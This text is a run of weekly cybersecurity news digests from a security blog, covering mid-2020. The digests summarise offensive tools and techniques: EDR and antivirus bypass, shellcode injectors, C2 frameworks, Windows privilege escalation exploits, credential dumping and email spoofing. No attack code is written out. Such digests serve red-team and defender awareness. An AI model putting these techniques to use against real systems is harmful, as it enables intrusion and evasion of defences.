  • CreateFile_based_rootkit - Windows' DOS origins rears its ugly head once again with a bug where NtCreateFile can access directories with strange names like " ." but CreateFile cannot - it returns " " instead. This could prove useful if EDR tools use CreateFile, and also hides directories from explorer.exe and cmd.exe. [T1562 Impair Defenses]

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • IntelOwl - analyze files, domains, IPs in multiple ways from a single API at scale.
  • freenom.com is a free domain registrar for .tk, .ml, .ga, .cf, and .gq domains. This could be useful for bug bounties or other engagements.
  • CFB is a distributed tool for capturing I/O request packets (IRPs) sent to any Windows driver. This is very useful for driver reverse engineering and fuzzing. Check out the examples here.

This post is cross-posted on SIXGEN's blog.

βœ‡Bad Sector Labs Blog

Last Week in Security (LWiS) - 2020-07-20

By: Erik β€”

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-07-13 to 2020-07-20. MITRE ATT&CK techniques are in brackets where appropriate.

News

Techniques

Tools and Exploits

  • capa detects capabilities in executable files. You run it against a PE file or shellcode and it tells you what it thinks the program can do. For example, it might suggest that the file is a backdoor, is capable of installing services, or relies on HTTP to communicate. Details on the Fireeye Blog.
  • project-citadel is a free & open source alternative project management tool that offers basic task tracking through a Kanban board (think Trello).
  • pwn-machine is a self hosting solution based on docker aiming to provide an easy to use pwning station for bughunters. This is a first release, but it could become a very cool platform to help automate the backend stuff required to find interesting bugs. More information in this blog post.
  • McAfee Total Protection (MTP) < 16.0.R26 Escalation of Privilege (CVE-2020-7283). Another AV allows for local privilege escalation due to symlink mishandling and overly permissive permissions. [T1068 Exploitation for Privilege Escalation]
  • RequestAADRefreshToken obtains a refresh token for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account). An attacker can then use the token to authenticate to Azure AD as that user. More info on the Specter Ops blog.
  • RuralBishop is practically a carbon copy of UrbanBishop by b33f, but all P/Invoke calls have been replaced with D/Invoke.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

This post is cross-posted on SIXGEN's blog.

βœ‡Bad Sector Labs Blog

Last Week in Security (LWiS) - 2020-07-27

By: Erik β€”

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-07-20 to 2020-07-27. MITRE ATT&CK techniques are in brackets where appropriate.

News

Techniques

Tools and Exploits

  • Boomerang is a tool to expose multiple internal servers to web/cloud. This project is in early stages, and has no authentication or encryption, but may provide a good base if you are looking to write your own tunneling agent with Go.
  • RpcSsImpersonator is an Administrator or Network Service to SYSTEM privilege exploit for Windows.
  • Malwarebytes-Disabler injects shellcode into a malwarebytes process which allows a user to disable "Malware Protection" even if the Malwarebytes administrator has set a password to protect this setting from being changed. [T1562.001 Impair Defenses: Disable or Modify Tools]
  • SpaceRunner enables the compilation of a C# program that will execute arbitrary PowerShell code, without launching PowerShell processes through the use of runspace and includes AMSI patching. [T1562.006 Impair Defenses: Indicator Blocking]
  • KITT-O365-Tool is a tool designed to make working O365 Business Email Compromise investigations easier and more efficient for DFIR and SOC analysts by pairing the power of PowerShell cmdlets with the ease of use of a GUI.
  • DeimosC2 is a post-exploitation Command & Control (C2) tool that leverages multiple communication methods in order to control machines that have been compromised. DeimosC2 server and agents works on, and has been tested on, Windows, Darwin, and Linux. It is entirely written in Golang with a front end written in Vue.js. This is a very impressive 1.0 release!
  • vopono is a tool to run applications through VPN tunnels via temporary network namespaces. This allows you to run only a handful of applications through different VPNs simultaneously, whilst keeping your main connection as normal.
  • dazzleUP is a tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems. It uses the Windows Update Agent API instead of WMI (like others) when finding missing patches, and comes with a CobaltStrike cna script. [T1068 Exploitation for Privilege Escalation]
  • CVE-2020-15778 is a simple command injection in openssh <= 8.3p1. If you have access to a linux host without shell access but only scp access, you just got shell access.
  • Carbuncle is a tool for interacting with outlook interop during red team engagements; enumerate, read, monitor, and send email.

This post is cross-posted on SIXGEN's blog.

βœ‡Bad Sector Labs Blog

Last Week in Security (LWiS) - 2020-08-03

By: Erik β€”

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-07-27 to 2020-08-03. MITRE ATT&CK techniques are in brackets where appropriate.

News

  • United States of America v. Nima Fazeli. Some really bad OPSEC on display from the teen that hacked Twitter a few weeks ago. The voice phishing combined with the 2FA bypass was very well executed, but the same cannot be said for post-exploitation actions.
  • New 'unpatchable' exploit allegedly found on Apple’s Secure Enclave chip, here’s what it could mean. Physical access is required, and it was patched on newer devices (A12/A13 based devices) but still an interesting development for iOS security.
  • There's a hole in the boot. Another week, another named and logo'd vulnerability. This one takes advantage of the fact that the YY_FATAL_ERROR() function of the Grub bootloader simply prints a message and then returns to the calling function, instead of actually being a fatal error that halts loading. This allows a heap buffer overflow in the config parser if an attacker can control the grub.cfg file. This one will be very hard to effectively mitigate, as blocking vulnerable versions of Grub will break existing deployments, but without blocking vulnerable versions downgrade attacks would be effective against patched machines. Update Grub and then update the revocation list to close this hole.
  • Attack Detection Fundamentals. F-Secure puts out great free workshops for red and blue teamers.

Techniques

  • Exploiting popular macOS apps with a single β€œ.terminal” file.. The quarantine attribute is not correctly set by third party applications with file transfer capabilities (i.e. Slack) for .terminal files, which can lead to single click compromise of macOS endpoints.
  • CVE-2020–9934: Bypassing the macOS Transparency, Consent, and Control (TCC) Framework for unauthorized access to sensitive user data. Setting the $HOME variable in launchctl allowed Matt Shockley to modify the TCC database without disabling system integirty protection and give himself every entitlement without prompting the end user. This is a great find, and the post includes a simple script to acomplish this. If you perfer a compiled Swift binary, that is available as well.
  • Sparkling Payloads. GateKeeper on macOS can be a challenge for getting payloads to run in certain cases (i.e. they are downloaded by a browser by a user). This post shows how to use a well established update framework to get benign code past Apple's review, and "update" it to a malicious payload after delivery.
  • Removing Kernel Callbacks Using Signed Drivers. Kernel exploits on Windows have been featured a few times in LWiS (2020-07-20, 2020-05-11), and this post is another good example of the power of kernel level execution on Windows. Blue teams should be closely monitoring driver loads on all endpoints by this point, but if they aren't use the techniques presented in this post to bypass any/all AV. Code here.
  • bunk_bot is built on Python and its main purpose is to attend your online classes for you. I've included it here despite it not being directly relevant to security because the techniques it uses to accomplish its goals can be applied to security problems. Think automating user creation or automating AV/EDR testing.
  • Zoom Security Exploit – Cracking private meeting passwords. 6 digit passwords and no rate limiting. What could possibly go wrong? The technique of simply removing the CSRF header surprisingly worked, and goes to show that you can never assume that because a control appears to be in place it is actually being enforced without checking.
  • The Curious Case of Aspnet_Compiler.exe. This post explores code execution with the Microsoft signed executable aspnet_compiler.exe. Another LOLBin!
  • Password Spraying Secure Logon for F5 Networks shows how to use a macro in burp suite to handle custom session rules. This method of request modification is generally applicable to lots of scenarios when brute forcing web logins.
  • Active Directory Computer Account SMB Relaying Attack. "SMB relaying is old hat" I hear you saying, which is true, but this specific flavor is new. With only unprivileged domain creds, an attacker can use the print spooler on one victim machine to authenticate to an attacker controlled relay which in turn allows attacker access as system to the second victim - assuming the first victim has admin rights to the second. The workhorse of this attack is this script.
  • One Click to Compromise -- Fun With ClickOnce Deployment Manifests. This was presented at BlackHat last year but just like the author, I missed it as well. One click + a security dialog = RCE. Test this out and it might become a new phishing technique to add to your toolkit.

Tools and Exploits

  • Unauthd - Logic bugs FTW. Security researcher Ilias Morad aka @A2nkF_, describes a lovely exploit chain, composed of several security vulnerabilities he uncovered in macOS. This chain creates a local privilege escalation (LPE), from user all the way to the kernel! Code here. [T1068 Exploitation for Privilege Escalation]
  • SharpAppLocker is a C# port of the Get-AppLockerPolicy PS cmdlet. [T1082 System Information Discovery]
  • hvmi - Hypervisor Memory Introspection. The main purpose of this project is to provide unmatched security from outside the virtual machine, by leveraging the hardware isolation provided by Intel VT-x. This is a super powerful capability, and a good post explaining how it works and what can be done with is is available here.
  • DSA-2020-128: iDRAC Local File Inclusion Vulnerability. If your iDRAC isn't on a locked down subnet with monitored access, you're doing it wrong. This vulnerability will likely bear fruit on internal assessments for years to come. No PoC yet.
  • freki is a self-hosted malware analysis tool which is able to quickly statically analyze malware, integrate with VirusTotal, and perform pattern matching with Yara rules.
  • C_Shot is an offensive security tool written in C which is designed to download, inject, and execute shellcode in memory - either its own process or a child process using parent process spoofing. The blog post shows how it can evade advanced EDR like CrowdStrike Falcon. I'm a bit surprised that it wasn't detected as it uses standard API calls to do APC process injection (VirtualAlloc, WriteProcessMemory, QueueUserAPC, ResumeThread). Pair this with direct syscalls for a likely more effective bypass. [T1055.004 Process Injection: Asynchronous Procedure Call]
  • Winstrument is a framework of modular scripts to aid in instrumenting Windows software using Frida for reverse engineering and attack surface analysis. Winstrument makes analyzing Windows apps easy, helping you quickly identify application functionality that might be insecure or warrant further review and could be useful on your next app assessment, or for finding a vulnerability in a Windows application on your next network assessment. Blog post here.
  • CVE-2020-1313. You thought there would be a LWiS without a Windows LPE? This is a proof of concept for an "older" (patched June 2020) vulnerability in the Windows Update Orchestrator Service. It won't give you an instant win, but will execute at 2320 or within 3 days.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • festin is a tool for discovering open S3 Buckets starting from a domain.
  • MΓ­stica is a tool that allows to embed data into application layer protocol fields, with the goal of establishing a bi-directional channel for arbitrary communications. Currently, encapsulation into HTTP, DNS and ICMP protocols has been implemented, but more protocols are expected to be introduced in the near future. [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol]
  • ATTPwn is a computer security tool designed to emulate adversaries. The tool aims to bring emulation of a real threat into closer contact with implementations based on the techniques and tactics from the MITRE ATT&CK framework.
  • Ventoy is an open source tool to create bootable USB drive for ISO files. Stop formatting the same USB over and over for the OS you need at the time, and just store and boot from a list of ISOs.
  • portmaster is a privacy app that at its core simply intercepts all your network connections. Think of a pi-hole for your computer. Or an ad-blocker that blocks ads on your whole computer, not only on your browser. This is an open-source version of Little Snitch or GlassWire. Still in alpha, but something to keep an eye on.
  • Hacking with environment variables is a quick post showing some little known environment variables that can be used to execute code in unexpected places.
  • Ciphey is a fully automated decryption tool using natural language processing & artificial intelligence, along with some common sense.

This post is cross-posted on SIXGEN's blog.

βœ‡Bad Sector Labs Blog

Last Week in Security (LWiS) - 2020-08-10

By: Erik β€”

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-08-03 to 2020-08-10.

News

  • Exposing and Circumventing China's Censorship of ESNI. While I can't say this is a direct consequence of my DEF CON talk putting ESNI in the "mainstream" infosec media, the timing is suspect. I hope that TLS 1.3 adoption picks up to a point where this kind of censorship is too costly to be effective. In the meantime, workarounds are being researched.
  • U.S. Government Contractor Embedded Software in Apps to Track Phones (Paywall - Non-paywall here). SDKs and advertising identifiers can be used to track users across apps, and likely across phones. This feature is being sold to whomever can pay. While this has always been the case, seeing it spelled out is a bit frightening. iOS 14 brings additional privacy protections which might help curb this type of tracking, but the middle ground between "secluded privacy obsessed person" and "all your info is available to anyone who can pay" is becoming nonexistent.
  • The Current State of Exploit Development, Part 1. Ever wonder why you aren't popping shells unauthenticated on remote systems like you used to? This post walks through legacy and some modern exploit mitigations that are making the attacker's life harder.
  • Rewards for Justice – Reward OfferΒ for Information on Foreign Interference in U.S. Elections. This is pretty interesting, "up to" $10 million for identifying or locating a person that is hacking US elections for a foreign government. Is the Department of State issuing letters of marque again?!

Techniques

  • Masking Malicious Memory Artifacts – Part III: Bypassing Defensive Scanners. Forrest Orr is back to drop more fileless malware knowledge. If you only read one thing this week, read this post. .Net DLL hollowing looks to be a weakness of all the tested memory scanners due to high false positives. Use this to your advantage when writing your next red team tool.
  • Building a lab with Server 2019 Server Core and PowerShell …then attacking it! If you don't have an AD lab setup yet, this is the guide you were waiting for.
  • Persistent JXA explores the strange world of "Javascript for Automation" on macOS and introduces a few persistence mechanisms for developer machines. Code here.
  • The Art Of Mac Malware is an online, free book from Patrick Wardle about macOS malware. It's collaborative, so review and add your knowledge! Be sure to check out his DEF CON talk which includes a very slick logic bug chain for sandbox escape here.
  • Ghostscript SAFER Sandbox Breakout (CVE-2020-15900). This is pure adversary emulation goodness. Red teamer needs a shell, researches a technology, fuzzes the technology, pwns the technology (0day), and shells the target. If you wonder why true red team/adversary emulation engagements are more expensive than a "vulnerability scan" where they hand you Nessus results, this is why. Well done @pruby.
  • Routopsy – Hacking Routing with Routers. Stop ping sweeping /16 networks and use the vulnerable routers to tell you about the actual ranges instead! Once you find a good target, use the same vulnerable routers to to inject a malicious route and get traffic from that target. Congratulations, you are now the router. The potential impact of this is pretty big. Consider what would happen if a target suddenly resolved every domain to a fake SSO page you control? The sensepost team gets extra credit for including two vulnerable scenarios as docker-compose files in the repo so you can test out the tool in your lab.
  • Exploiting vBulletin: β€œA Tale of a Patch Fail” is a great example of how a patch is not always the end of a bug's life. In this case vBulletin 5.0 to 5.4 can be exploited with a single curl command.
  • Chaining multiple vulnerabilities to exfiltrate over 250GB of PIA. These kinds of articles are amazing, but so rare. An actual exploit chain used against a real company. New tricks and tools to be found in this one.
  • Digging further into the Primary Refresh Token. The AD whisperer drops another post. This time he the explores inner workings of the CloudAP plug-in in lsass, the cryptographic keys used to authenticate with the PRT. These are accompanied by new features in ROADtools to interact with the PRT cookie and the new mimikatz version.

Tools and Exploits

  • TelemetrySourcerer can enumerate and disable common sources of telemetry used by AV/EDR on Windows. This will be super helpful for your AV/EDR lab.
  • Compromising the macOS Kernel through Safari by Chaining Six Vulnerabilities. This is top shelf exploitation. Browse to a website, get kernel execution. When I dream of "advanced nation state" exploits this is what I dream of. The talk isn't avaialbe yet, but the slides are.
  • go-sharp-loader. Pack your favorite .NET executables into this loader and run them from memory. Add some encryption for better AV evasion.
  • Octopus v1.0 stable: Cobalt Strike deployment & much more!. Not a new tool, but stable 1.0 is a big step. I love the concept behind a "pre-operation C2" as its what the best APTs are doing.
  • estigmergio.py infers prefixes/suffixes/common substrings inside a list of subdomains and build a dictionary. This is the kind of custom tooling that sets you apart from all the other bug hunters. Well played @TheXC3LL.
  • Bug-Bounty-Colab uses Google Collab as a "VPS" for bug bounties, much like penglab did (LWiS 2020-06-15). I wonder how long Google will allow this?
  • dropengine is a malleable payload generation framework. In practical terms, it allows you to define payloads using different modules (interfaces, crypters, decrypters, encryption keys, decryption keys, executors, and mutators) to rapidly generate a variety of payloads. It also includes support for environmental keying, which will keep your payloads undetected for longer by only executing on the desired targets without manual reversing. When delivering a binary to an unknown environment with possible EDR, this will prove very handy.
  • Stealthily Access Your Android Phones: Bypass the Bluetooth Authentication - BlueRepli. Android will allow access to contacts and other information via Bluetooth with no user interaction for at least one major manufacturer, and the rest it is a single prompt. Expect both law enforcement and malicious actors to take advantage of this. iOS is not affected.
  • vx includes a new HellsGate example written is pure assembly for dynamically extracting and invoking syscalls from in-memory modules on Windows. This could be used in your custom tooling to implement the HellsGate technique.
  • Spooler contains the tools developed during the Print Spooler research which was presented at Black Hat USA 2020 and DEF CON 28 Safe Mode ("A Decade After Stuxnet's Printer Vulnerability: Printing is still the Stairway to Heaven").
  • mole is a framework for identifying and exploiting out-of-band application vulnerabilities. The client is used to create payloads during manual testing and automatically injects tokens into the predefined payloads. The mole server then listens for and alerts when these out-of-band payloads are triggered. Useful for testing XSS, XXE, PDF, and OOXML vectors.
  • mkhtaccess_red. Auto-generate an HTaccess for payload delivery -- automatically pulls ips/nets/etc from known sandbox companies/sources that have been seen before, and redirects them to a benign payload.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • overlord Overlord provides a python-based console CLI which is used to build Red Teaming infrastructure in an automated way. The user has to provide inputs by using the tool’s modules (e.g. C2, Email Server, HTTP web delivery server, Phishing server etc.) and the full infra / modules and scripts will be generated automatically on a cloud provider of choice. Currently supports AWS and Digital Ocean.
  • Turning on network protection. Did you know Microsoft Defender has a built in network protection feature? Enable it with a simple registry change, and pay no mind to the references to Defender ATP, it works on regular Windows 10 installs.
  • Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. MobSF supports mobile app binaries (APK, IPA & APPX) along with zipped source code and provides REST APIs for seamless integration with your CI/CD or DevSecOps pipeline. The Dynamic Analyzer helps you to perform runtime security assessment and interactive instrumented testing.
  • PurpleSharp is an open source adversary simulation tool written in C# that executes adversary techniques within Windows Active Directory environments. The resulting telemetry can be leveraged to measure and improve the efficacy of a detection engineering program. PurpleSharp leverages the MITRE ATT&CK Framework and executes different techniques across the attack life cycle: execution, persistence, privilege escalation, credential access, lateral movement, etc. It currently supports 37 unique ATT&CK techniques. Blog posts here.
  • reconness creates a platform to allow continuous recon (CR) where you can set up a pipeline of recon tools (Agents) and trigger it base on schedule or events.
  • IntelOwl is for everyone who needs a single point to query for info about a specific file or observable (domain, IP, URL, hash). Put in your API keys for all the services you manually query, and then have a single endpoint for getting information about indicators in your environment.
  • CSharpWinRM move laterally with WinRM from a CSharp binary (or better - in memory execution).
  • AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim's desktop without his consent, and even control it on demand, using tools native to the operating system itself.

This post is cross-posted on SIXGEN's blog.

βœ‡Bad Sector Labs Blog

Last Week in Security (LWiS) - 2020-08-17

By: Erik β€”

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-08-10 to 2020-08-17.

News

  • Internet Explorer and Windows zero-day exploits used in Operation PowerFall. Two 0days were used in this campaign that targeted a South Korean company, a user-after-free in IE 11 on Windows 10, and an elevation of privilege related to kernel memory handling. Even if you are on Windows 10, Internet Explorer is a bad idea.
  • Russian GRU 85th GTsSSDeploys PreviouslyUndisclosed Drovorub Malware. The NSA and FBI tear down Russian Linux malware and dig into all the details in this 39 page (!) report. They specifics on the server configuration shows that they had access to live C2 nodes. This tactic of naming and shaming nationstate malware started with the US CYBERCOM twitter, and its good to see it carry over into well researched reports.
  • New Developments: Retiring CTP and Introducing New Courses. CTP/OSCE are soon to be retired and replaced with three separate courses that must be complete to earn a "new OSCE." While I agree that OSCE is out of date, it does introduce good content, and I'm sure students will not be excited to have to pay for 3 courses to earn a certificate that used to be one. However, Offensive Security provides the best reasonably priced, hands on, recognized certificates out there (besides rastamouse's Red Team Ops).
  • Call Me Maybe: EaΒ­vesΒ­dropΒ­ping EnΒ­crypΒ­ted LTE Calls With ReΒ­VoLΒ­TE. Another instance of the RFC not matching implementation. Base station (eNodeB) implementations of VoLTE reuse keystreams for concurrent calls, allowing a malicious actor to capture a call, place another, and use the keystream from the second to decrypt the first. Demo here.
  • Microsoft Put Off Fixing Zero Day for 2 Years. Brian Krebs digs into CVE-2020-1464, an issue with how Windows validates file signatures commonly used to execute jar based attacks. Triage is hard, but this seems like an issue that should have been fixed much faster.

Techniques

Tools and Exploits

  • eidc32proxy. Is a pure Go proxy for eidc32 proximity systems. It allows for "skeleton key" credentials to operate locks without logging to the controler. Check out the demo here.
  • sinter is a 100% user-mode endpoint security agent for macOS 10.15 and above, written in Swift. This is inspired by Google's Santa but doesn't require a kernel extension (which is not allowed in macOS 11) and has more features.
  • Zolom is a C# executable with embedded Python that can be used reflectively to run python code on systems without Python installed. Yo dawg, I heard you like high level languages ...
  • SharpEDRChecker checks running processes, process metadata, DLLs loaded into your current process and the each DLLs metadata, common install directories, installed services and each service binaries metadata, installed drivers and each drivers metadata, all for the presence of known defensive products such as AV's, EDR's and logging tools.
  • A Change of Mythic Proportions. Apfell C2 is now Mythic C2 which better reflects how adaptable it is. This update is a big one, so if you have checked out Apfell in the past, be sure to take another look.
  • Windows-Setup-EoP. This is an exploit for a time of check/time of use vulnerability in the windows "feature update" (i.e. 1909 to 2004) process. Demo here.
  • VMProtect Tools
    • vmpattack is a VMProtect to Virtual-machine Translation Intermediate Language (VTIL) lifter. This can help get VMProtected binaries into a state that will help with analysis.
    • NoVmp is a project devirtualizing VMProtect x64 3.0 - 3.5 (latest) into optimized VTIL and optionally recompiling back to x64 using the VTIL library.
  • wacker is the first (I think?) tool for WPA3 dictionary attacks!
  • CVE-2020–14979: Local Privilege Escalation in EVGA Precision X1. Poorly written drivers are the gift that keep on giving. In this case, local privilege escalation is the gift. This driver is included in Screwed-Drivers.
  • dnsfserv is a fileserver over DNS, with wrapper library and example stager. You never know when you might be in a super restricted env and need to stage over DNS.

This post is cross-posted on SIXGEN's blog.

βœ‡Bad Sector Labs Blog

Last Week in Security (LWiS) - 2020-08-24

By: Erik β€”

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-08-17 to 2020-08-24.

News

Techniques

  • Performing Kerberoasting without SPNs adds the -usersfile option to GetUserSPNs.py, which requests tickets for each line from the specified file using the NT-ENTERPRISE type, and changed the default behavior from usage of service principal names to usage of SAM Account Names. This allows the retrieval of a Kerberos ticket in scenarios that otherwise would have failed, and allows mass-checking a list of SAM accounts for Kerberos tickets, not just those accounts that have SPNs!
  • Attacking Azure & Azure AD, Part II introduces PowerZure 2.0 which add all kinds of neat features, my favorite being New-AzureIntuneScript which uploads a PowerShell script to Intune which will execute by default against all devices. Hope you have load balancing on your C2 server for all the shells that will call back!
  • Windows .Net Core SDK Elevation of Privilege. @RedVuln found the original vulnerability, and @itm4n dug into it. A nice Windows privesc for a user that has the .NET Core SDK installed, and isn't a local admin anymore, or SYSTEM persistence if they are.
  • Wireshark Tutorial: Decrypting HTTPS Traffic is a basic but well done tutorial.
  • How to contact Google SRE: Dropping a shell in cloud SQL. SQL injection in Cloud SQL! Just when you think the major cloud providers have security on lock, you read something like this. The good news is how fast the SRE responded and the issues were dealt with.

Tools and Exploits

  • DumpReparsePoints is a new tool from @tiraniddo that dumps all reparse points of an NTFS drive on Windows. What is a reparse point? Fun things like symbolic links, hard links, and directory junctions, among others. I'm sure this means there are about to be more file-link based attacks/LPEs from James soon.
  • SharpBlock. The tool isn't new but the fact you can load binaries via http or over a named pipe and inject them into memory is a huge new feature. Take inspiration from this for your next EDR bypassing loader.
  • LNKMod is a C# project to create or modify existing LNKs.
  • mapcidr is a small utility program to perform multiple operations for a given subnet/CIDR ranges.
  • tracee is a lightweight and easy to use container and system tracing tool. It allows you to observe system calls and other system events in real time. Intended as a debugging tool, tracee has implications for Linux red team tools for process monitoring system side.
  • tunshell is billed as a "remote shell into ephemeral environments" and acts a bit like ngrok + a shell. The beauty of tunshell is that its client is a statically-linked, pre-compiled binary which can be installed by downloading it with a one-liner script. It was built for debugging CI environments, but there are obvious red team use cases.
  • CmpDoReDoCreateKey Arbitrary Registry Key Creation EoP and CmpDoReadTxRBigLogRecord Memory Corruption EoP were patched and dropped with PoCs that aren't ready for use on an engagement but would be good starting points for weaponization.
  • Windows AppX Deployment Service Local Privilege Escalation (CVE-2020-1488). Another AppX bug leads to local privilege escalation that reminds me of CVE-2019-1064.
  • DVS - D(COM) V(ulnerability) S(canner) AKA Devious swiss army knife - Lateral movement using DCOM Objects. The DVS framework contains various ways to bypass remote hardening against DCOM by re-enabling DCOM access remotely and automatically grant the required permissions to the attacking user. The framework can also revert changes on the remote machine to their original state, prior to the attack.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • SharpKatz is a C# port if of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands for your C# in memory needs.
  • Wizer Training is a freemium phishing training platform. Very interesting model, and I'm excited to try it out. Don't be fooled by wizertraining.com which was briefly redirecting to knowbe4.com. If the competition is playing dirty, you must be doing something right!
  • wonitor is a fast, zero config web endpoint change monitor. For comparing responses, a selected list of http headers and the full response body is stored on a local key/value store file. No configuration needed.
  • espoofer is an email spoofing testing tool that aims to bypass SPF/DKIM/DMARC and forge DKIM signatures.

This post is cross-posted on SIXGEN's blog.

βœ‡Bad Sector Labs Blog

Last Week in Security (LWiS) - 2020-08-31

By: Erik β€”

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-08-24 to 2020-08-31.

News

Techniques

Tools and Exploits

  • USO_Info_Leak contains two 0day heap address leak bugs in the usosvc service. The author claims to have 44 more Windows 10 elevation of privilege bugs that have been submitted to Microsoft but not handled well. I'll be following them closely to see if more are released.
  • Octopus isn't new but v1.2 sees a host of new features including: shellcode generation for x86 and x64, spoofed arguments, word macro generation, better AV evasion, and an indicator to show privileged user shells. More info here.
  • jwt-hack is a swiss-army knife for JSON web tokens, to include a dictionary attack.
  • RunasCs isn't new but v1.3 brings the ability to redirect stdout, stdin, and stderr to a remote host as well as other new features and fixes.
  • sonarhawk is a tool to create precise maps of WiFi networks using commodity GPS hardware and a portable computer. Supports Linux, MacOS, and Windows. Useful for mapping WiFi networks while on physical red team engagements or wardriving/warwalking. Similar to the Kismet plugin Kestrel.
  • gdb_2_root is a script for rooting x86_64 Google Play Android 10 images in an emulator.
  • LazyGhidra adds convenience functions to Ghidra like LazyIDA does for IDA Pro.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • iblessing is an iOS security exploiting toolkit, it mainly includes application information collection, static analysis and dynamic analysis. It can be used for reverse engineering, binary analysis and vulnerability mining.
  • bluescan is a powerful Bluetooth scanner for scanning BR/LE devices, LMP, SDP, GATT and vulnerabilities!
  • Hack-Tools is the all-in-one Red Team extension for Web Pentester. Useful features include: Dynamic Reverse Shell generator (PHP, Bash, Ruby, Python, Perl, Netcat), XSS Payloads, SQLi payload, LFI payloads, Base64 encoder/decoder, hash generator, and more.
  • monsoon is a fast HTTP enumerator that allows you to execute a large number of HTTP requests, filter the responses and display them in real-time.

This post is cross-posted on SIXGEN's blog.

βœ‡Bad Sector Labs Blog

Last Week in Security (LWiS) - 2020-09-07

By: Erik β€”

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-08-31 to 2020-09-07.

News

Techniques

  • Pwning Windows Event Logging with YARA rules. This project allows for offensive operators to selectively mute logging using Yara rules in memory. It works by injecting a hook into the ETW event callback function and using Yara to scan the contents of every event to determine if it should be dropped or not. EvtMute contains all the code and example Yara rules.
  • Privilege Escalation in AWS Elastic Kubernetes Service (EKS) by compromising the instance role of worker nodes. AWS account-wide denial of service and enumeration is accessible by only having compromised a single, underprivileged pod in the cluster. The AWS accounts in question come by default when spinning up an EKS cluster. The post includes remediation steps to block the AWS metadata service access from pods to prevent this attack.
  • Abusing dynamic groups in Azure AD for privilege escalation. Putting AD in the cloud introduced new features, and new potential vulnerabilities, in this case the ability to abuse dynamic groups to access other accounts or modify attributes. If AD Connect Sync is in use, on-prem ADs can be affected as well.
  • So, You Got Access to a *nix system… Now What?. This quick post is a basic overview, but may contain a new script or command you didn't previously know about.
  • Custom DLL injection with Cobalt Strike's Beacon Object Files. Cobalt Strike is a great C2 platform, but the fact that it is popular means it will be detected without some work to modify it. In this post Tom Carver works through building a custom DLL injector using the new Beacon Object File spec from the 4.1 release.
  • WSUS Attacks Part 1: Introducing PyWSUS. Scary things happen when you can Man-in-the-middle connections. In this post, ARP spoofing is used to intercept and respond to a Windows update request which allows for arbitrary code execution as SYSTEM if the system is not using HTTPS for WSUS. Video here, code here.
  • living-off-the-land combines some tricks to achieve persistence with two registry writes (semi-hidden) and no files on disk.

Tools and Exploits

  • SharpSecDump is a .Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py. By default runs in the context of the current user, but can use alternate credentials supplied on the command line. Note: this doesn't have DCSync functionality yet so no AD dumping - use SharpKatz for that.
  • SeasideBishop: A C port of b33f’s UrbanBishop shellcode injector. AV/EDR detecting your standard injection methods? Try this latest iteration of the *Bishop series which uses some tricks and APC queuing to inject shellcode into a process. Code here.
  • CVE-2020-7460: FreeBSD Kernel Privilege Escalation. A rare FreeBSD privilege escalation for any 64 bit kernel since 2014. PoC here.
  • TREVORspray is a featureful Python O365 sprayer based on MSOLSpray which uses the Microsoft Graph API that can use SSH hosts to proxy requests.
  • vmpdump is yet another (this makes 3, see LWiS-2020-08-17) VMProtect deobfuscator.
  • Ubuntu ppp's CVE-2020-15704 wrap-up. On certain Ubuntu machines from 12.04 to 20.04 (KVM kernel builds) that don't have /dev/ppp, modprobe environment variables can be used for arbitrary file read.
  • Watchcom Security Group uncovers Cisco Jabber vulnerabilities. Cisco Jabber is often seen in enterprise environments for team collaboration and is another good example of how using Electron/Chromium based apps can turn a simple XSS into an RCE.
  • CVE-2020-0986: Windows splwow64 Untrusted Pointer Dereference. Google Project Zero drops this Windows privilege escalation (patched 2020-06-09) that was reported by Kaspersky Lab who found it being used in the wild.
  • chlonium is a C# application designed for cloning Chromium Cookies. The unique feature here is the utility to allow the easy importing of Chrome cookies into a second browser. Demo here.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • wordlist_generator generates wordlists with unique words with techniques mentioned in tomnomnom's report "Who, What, Where, When". It takes URLs from gau and splits them to get words in URLs. Then it requests each URL to fetch all words. Finally, wordlist_generator removes from wordlist everything from "denylists" directory files to keep only unique words, which you can use for domain, directory, parameter, vhosts, etc bruteforcing.

This post is cross-posted on SIXGEN's blog.

βœ‡Bad Sector Labs Blog

Last Week in Security (LWiS) - 2020-09-14

By: Erik β€”

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-09-07 to 2020-09-14.

News

Techniques

Tools and Exploits

